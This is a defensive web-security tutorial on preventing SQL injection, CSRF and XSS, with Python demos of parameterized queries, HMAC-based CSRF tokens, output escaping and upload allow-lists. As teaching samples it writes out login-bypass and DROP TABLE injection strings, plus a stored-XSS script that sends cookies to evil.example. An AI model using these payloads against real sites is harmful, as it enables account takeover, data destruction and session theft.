There are many ways to attack a web application. This post walks through how to prevent the most basic and most commonly used ones: SQL injection, CSRF and XSS.
SQL Injection
- Applications that talk to a database often take values straight from the client request and paste them into the query. Attackers rely on exactly this to change the query the database ends up running.
- Example: a login function. The request sends a username and password to the server, and the server builds the query by pasting them into a string: SELECT * FROM user WHERE username='username' AND password='password'
- If the attacker sends ' OR '1'='1 as the username, the query becomes SELECT * FROM user WHERE username='' OR '1'='1' AND password='abc'. Note that AND binds tighter than OR, so this particular payload still needs the password to match; put it in the password field instead, or send ' OR 1=1 -- as the username, which comments out the rest of the WHERE clause. Either way the query returns rows for an account the attacker never had credentials for, and they are logged in. If the database driver allows several statements in one call, the same input channel can carry '; DROP TABLE user; -- and delete tables or whole databases.
- Every current framework and database driver supports parameterized queries (prepared statements, usually wrapped by the framework's query builder): the SQL text is a fixed template with placeholders, and the parameter values are sent separately as typed data (text, number, ...), so they can never change the structure of the statement.
- Escaping special characters in the input is only a fallback for the rare places where a value cannot be bound as a parameter (a table or column name, an ORDER BY direction); prefer an allow-list of accepted values there rather than hand-written escaping.
- Conclusion: to avoid SQL injection, do not build queries by concatenating raw strings. Use the parameterized queries or query builder the framework provides, and if a raw query is unavoidable, validate the data before it reaches the query.
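The login example above, worked in Python against an in-memory SQLite table. This is an added illustration, not code from the original post: the table, the two users and the `login_vulnerable` / `login_safe` functions are constructed for the demo, and passwords are stored in clear only to mirror the page's query (a real system compares a password hash). It shows the page's payload, the precedence caveat, and the same inputs bouncing off a parameterized query.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a tiny in-memory user table standing in for the real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """The pattern the page warns about: request values pasted into the SQL text,
    so quote characters in the input become part of the SQL grammar."""
    sql = f"SELECT username FROM user WHERE username='{username}' AND password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the SQL is a fixed template with ? placeholders and the
    values travel separately as data, so they can never alter the statement."""
    sql = "SELECT username FROM user WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The page's payload in the username field: AND binds tighter than OR, so the
    # condition is username='' OR ('1'='1' AND password='abc') and no row matches.
    print(login_vulnerable(db, "' OR '1'='1", "abc"))       # None
    # Same payload in the password field: (username='alice' AND password='') OR '1'='1'
    # is true for every row, so the first user comes back without a valid password.
    print(login_vulnerable(db, "alice", "' OR '1'='1"))     # alice
    # Comment out the password check entirely: logged in as the first user in the table.
    print(login_vulnerable(db, "' OR 1=1 --", "whatever"))  # alice
    # The same inputs against the parameterized query are just strings matching no user.
    print(login_safe(db, "' OR 1=1 --", "whatever"))        # None
    print(login_safe(db, "alice", "' OR '1'='1"))           # None
    print(login_safe(db, "alice", "s3cret"))                # alice
```

Whether the "delete tables" scenario works through this hole depends on the driver: Python's `sqlite3.execute()` refuses to run more than one statement per call, while some other drivers and databases execute stacked statements happily, so never rely on that refusal as a defence. The fix is the same in every case: bind the values, never concatenate them.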
CSRF
- Your web application accepts form posts from the user's browser. What happens if a page on another site makes the victim's browser submit that same form, with the victim's session cookie attached automatically, but with data the attacker chose? The server sees a normal, authenticated request. That is Cross-Site Request Forgery (CSRF).
- To stop it, use a CSRF token. The server puts an unpredictable token, bound to the visitor's session, into every form it serves; the browser submits it along with the form data; and the server rejects any state-changing request whose token is missing or does not match. A page on another origin cannot read the token out of the victim's page, so it cannot forge a valid request. Setting the session cookie with SameSite=Lax or Strict is a worthwhile second layer, but the token check is what the server can actually enforce.
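The token flow described above, as an added example in Python rather than code from the original post. The server secret, the session ids, the `handle_transfer` endpoint and the `request` dictionaries standing in for HTTP requests are all constructed for the demo. The token is an HMAC over the session id and a fresh nonce, so it is valid only for the session it was issued to and the server does not have to store it.

```python
import hashlib
import hmac
import secrets

# Assumed: a per-deployment server secret; a real application loads it from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def _mac(session_id: str, nonce: str) -> str:
    return hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Called when rendering a form: a token bound to this visitor's session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def verify_csrf_token(session_id, token) -> bool:
    """Called on every state-changing request before any work is done."""
    if not session_id or not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    # Constant-time comparison so timing does not leak the expected MAC byte by byte.
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())


def handle_transfer(request: dict) -> str:
    """Stand-in for a 'transfer money' endpoint. `request` is a constructed dict holding the
    cookies the browser attached and the form fields that were posted."""
    session_id = request["cookies"].get("session")
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: transferred {request['form']['amount']} to {request['form']['to']}"


if __name__ == "__main__":
    victim = "sess-victim-123"
    # 1. Legitimate flow: the site rendered the form with a token for this session.
    token = issue_csrf_token(victim)
    print(handle_transfer({"cookies": {"session": victim},
                           "form": {"csrf_token": token, "amount": "10", "to": "bob"}}))
    # 2. Forged flow: evil.example auto-submits a form from the victim's browser. The browser
    #    attaches the session cookie, but the attacker could not read the token, so it is absent.
    print(handle_transfer({"cookies": {"session": victim},
                           "form": {"amount": "10000", "to": "attacker"}}))
    # 3. Attacker supplies a token issued for their own session: the HMAC does not match.
    print(handle_transfer({"cookies": {"session": victim},
                           "form": {"csrf_token": issue_csrf_token("sess-attacker-999"),
                                    "amount": "10000", "to": "attacker"}}))
```

The alternative design is to store a random token in the server-side session and compare on submit; it needs no secret but costs a lookup per request. Either way the check must run on every request that changes state, including ones that use GET by mistake, which is the main reason to keep state changes on POST in the first place.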
XSS
- Cross-Site Scripting (XSS) runs in the client's browser. It is often seen in forums and comment threads: when the application saves a post without checking it and later renders it into the page unchanged, the attacker embeds JavaScript that executes in every other visitor's browser and can read their cookies, redirect them to another site, log them out, or perform actions as them.
- A related mistake is in file upload, where the file type is what matters. If you allow a .php file to be uploaded into a directory the web server executes, the attacker uses that file as a web shell and takes over the whole server.
- Prevention: encode output for the context it is inserted into, escaping HTML special characters at the moment the post is rendered (a templating engine with auto-escaping does this for you), rather than trusting whatever was saved in the database. For uploads, enforce an allow-list of file extensions, never trust the client-supplied file name or MIME type, give the file a server-generated name, and store it outside the web root.
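Both halves of the prevention above in Python, as an added example and not code from the original post: `render_post` shows output encoding of a stored forum post, and `safe_upload_name` shows an extension allow-list that ignores the client's chosen name. The sample post, the allow-list policy and both function names are constructed for the demo.

```python
import html
import os
import secrets

# Constructed sample post, as an attacker would submit it to a forum.
STORED_POST = ('<script>document.location="http://evil.example/?c="+document.cookie</script>'
               ' nice post!')


def render_post(body: str) -> str:
    """Encode at output time for the HTML-body context. The database keeps the text
    verbatim (it may be edited or searched later); rendering is what must make it inert."""
    return f'<div class="post">{html.escape(body, quote=True)}</div>'


# Assumed upload policy: only extensions the web server will never execute.
ALLOWED_UPLOAD_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}


def safe_upload_name(client_name: str):
    """Return a server-chosen file name for an allowed upload, or None to reject it.
    The client-supplied name is consulted only to decide the extension."""
    base = os.path.basename(client_name.replace("\\", "/"))  # drop any path component
    root, ext = os.path.splitext(base)
    ext = ext.lower()                                         # shell.PHP is still PHP
    if not root or ext not in ALLOWED_UPLOAD_EXTENSIONS:
        return None
    if "." in root:  # reject double extensions such as shell.php.jpg
        return None
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    print(render_post(STORED_POST))   # the <script> tag appears as harmless text
    for name in ["cat.jpg", "photo.JPG", "shell.php", "shell.php.jpg",
                 "../../var/www/shell.PHP", ".htaccess"]:
        print(f"{name!r:30} -> {safe_upload_name(name)}")
```

`html.escape` is only correct for text placed in the HTML body; a value dropped into an attribute, a `<script>` block or a URL needs the encoding for that context, which is the reason to let a templating engine with auto-escaping do the work. The double-extension rule exists because some server configurations execute a file based on an earlier extension in its name, and storing uploads outside the web root removes the problem entirely.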